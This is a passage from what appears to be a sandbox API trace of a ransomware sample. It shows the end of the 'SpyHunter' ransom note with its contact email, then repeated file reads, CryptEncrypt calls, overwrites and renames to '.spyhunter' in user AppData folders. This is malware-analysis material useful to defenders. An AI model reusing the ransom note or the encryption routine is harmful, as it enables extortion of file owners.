company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0151.508] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x270ec23*, lpNumberOfBytesWritten=0x270ed4c*=0x127, lpOverlapped=0x0) returned 1 [0151.509] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.509] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed4c*=0x2ac, lpOverlapped=0x0) returned 1 [0151.509] CloseHandle (hObject=0xa0) returned 1 [0151.509] GetProcessHeap () returned 0x2c0000 [0151.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8638 | out: hHeap=0x2c0000) returned 1 [0151.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ece8 | out: pbBuffer=0x270ece8) returned 1 [0151.509] GetProcessHeap () returned 0x2c0000 [0151.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.510] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ece0*=0x30) returned 1 [0151.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned 114 [0151.511] StrStrW (lpFirst="www.google[1].xml", lpSrch=".txt") returned 0x0 [0151.511] GetProcessHeap () returned 0x2c0000 [0151.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.511] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270eca4*=0xd, lpOverlapped=0x0) returned 1 [0151.512] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.512] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x270eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270eca4*=0xd, lpOverlapped=0x0) returned 1 [0151.512] GetProcessHeap () returned 0x2c0000 [0151.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.512] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.512] WriteFile (in: hFile=0xa0, lpBuffer=0x270ece4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eca4, lpOverlapped=0x0 | out: lpBuffer=0x270ece4*, lpNumberOfBytesWritten=0x270eca4*=0x4, lpOverlapped=0x0) returned 1 [0151.512] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eca4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270eca4*=0x30, lpOverlapped=0x0) returned 1 [0151.512] CloseHandle (hObject=0xa0) returned 1 [0151.512] GetProcessHeap () returned 0x2c0000 [0151.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.513] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.spyhunter") returned 124 [0151.513] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.spyhunter")) returned 1 [0151.513] GetProcessHeap () returned 0x2c0000 [0151.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.513] GetProcessHeap () returned 0x2c0000 [0151.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.514] GetProcessHeap () returned 0x2c0000 [0151.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8500 | out: hHeap=0x2c0000) returned 1 [0151.514] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ece8 | out: pbBuffer=0x270ece8) returned 1 [0151.514] GetProcessHeap () returned 0x2c0000 [0151.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.514] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ece0*=0x30) returned 1 [0151.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.514] GetProcessHeap () returned 0x2c0000 [0151.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.514] GetProcessHeap () returned 0x2c0000 [0151.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c248 | out: hHeap=0x2c0000) returned 1 [0151.514] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ece0 | out: pbBuffer=0x270ece0) returned 1 [0151.514] GetProcessHeap () returned 0x2c0000 [0151.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.514] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecd8*=0x30) returned 1 [0151.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.514] GetProcessHeap () returned 0x2c0000 [0151.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.515] GetProcessHeap () returned 0x2c0000 [0151.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2c018 | out: hHeap=0x2c0000) returned 1 [0151.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ece0 | out: pbBuffer=0x270ece0) returned 1 [0151.515] GetProcessHeap () returned 0x2c0000 [0151.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecd8*=0x30) returned 1 [0151.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.515] GetProcessHeap () returned 0x2c0000 [0151.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.515] GetProcessHeap () returned 0x2c0000 [0151.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bf00 | out: hHeap=0x2c0000) returned 1 [0151.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecd8 | out: pbBuffer=0x270ecd8) returned 1 [0151.515] GetProcessHeap () returned 0x2c0000 [0151.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecd0*=0x30) returned 1 [0151.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.515] GetProcessHeap () returned 0x2c0000 [0151.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.516] GetProcessHeap () returned 0x2c0000 [0151.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bde8 | out: hHeap=0x2c0000) returned 1 [0151.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecd8 | out: pbBuffer=0x270ecd8) returned 1 [0151.516] GetProcessHeap () returned 0x2c0000 [0151.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecd0*=0x30) returned 1 [0151.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.516] GetProcessHeap () returned 0x2c0000 [0151.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.516] GetProcessHeap () returned 0x2c0000 [0151.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46028 | out: hHeap=0x2c0000) returned 1 [0151.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecd0 | out: pbBuffer=0x270ecd0) returned 1 [0151.516] GetProcessHeap () returned 0x2c0000 [0151.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecc8*=0x30) returned 1 [0151.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.516] GetProcessHeap () returned 0x2c0000 [0151.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.517] GetProcessHeap () returned 0x2c0000 [0151.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45c28 | out: hHeap=0x2c0000) returned 1 [0151.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecd0 | out: pbBuffer=0x270ecd0) returned 1 [0151.517] GetProcessHeap () returned 0x2c0000 [0151.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecc8*=0x30) returned 1 [0151.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.517] GetProcessHeap () returned 0x2c0000 [0151.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.517] GetProcessHeap () returned 0x2c0000 [0151.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f634f8 | out: hHeap=0x2c0000) returned 1 [0151.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecc8 | out: pbBuffer=0x270ecc8) returned 1 [0151.517] GetProcessHeap () returned 0x2c0000 [0151.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecc0*=0x30) returned 1 [0151.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0151.517] GetProcessHeap () returned 0x2c0000 [0151.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.518] GetProcessHeap () returned 0x2c0000 [0151.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f63408 | out: hHeap=0x2c0000) returned 1 [0151.518] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecc8 | out: pbBuffer=0x270ecc8) returned 1 [0151.518] GetProcessHeap () returned 0x2c0000 [0151.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.518] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecc0*=0x30) returned 1 [0151.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned 152 [0151.518] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", lpSrch=".txt") returned 0x0 [0151.518] GetProcessHeap () returned 0x2c0000 [0151.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0151.519] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ec84*=0x198, lpOverlapped=0x0) returned 1 [0151.519] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.519] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x198, lpNumberOfBytesWritten=0x270ec84, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ec84*=0x198, lpOverlapped=0x0) returned 1 [0151.519] GetProcessHeap () returned 0x2c0000 [0151.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0151.520] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.520] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec84, lpOverlapped=0x0 | out: lpBuffer=0x270ecc4*, lpNumberOfBytesWritten=0x270ec84*=0x4, lpOverlapped=0x0) returned 1 [0151.520] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec84, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec84*=0x30, lpOverlapped=0x0) returned 1 [0151.521] CloseHandle (hObject=0xa0) returned 1 [0151.521] GetProcessHeap () returned 0x2c0000 [0151.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.521] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.spyhunter") returned 162 [0151.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de.spyhunter")) returned 1 [0151.522] GetProcessHeap () returned 0x2c0000 [0151.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.522] GetProcessHeap () returned 0x2c0000 [0151.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0151.522] GetProcessHeap () returned 0x2c0000 [0151.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed148 | out: hHeap=0x2c0000) returned 1 [0151.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ecc0 | out: pbBuffer=0x270ecc0) returned 1 [0151.522] GetProcessHeap () returned 0x2c0000 [0151.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0151.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ecb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ecb8*=0x30) returned 1 [0151.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0151.523] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0151.523] GetProcessHeap () returned 0x2c0000 [0151.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0151.523] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec7c*=0x194, lpOverlapped=0x0) returned 1 [0151.524] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.524] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec7c*=0x194, lpOverlapped=0x0) returned 1 [0151.524] GetProcessHeap () returned 0x2c0000 [0151.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0151.524] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.524] WriteFile (in: hFile=0xa0, lpBuffer=0x270ecbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x270ecbc*, lpNumberOfBytesWritten=0x270ec7c*=0x4, lpOverlapped=0x0) returned 1 [0151.524] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec7c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec7c*=0x30, lpOverlapped=0x0) returned 1 [0151.524] CloseHandle (hObject=0xa0) returned 1 [0151.524] GetProcessHeap () returned 0x2c0000 [0151.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.524] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.spyhunter") returned 162 [0151.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 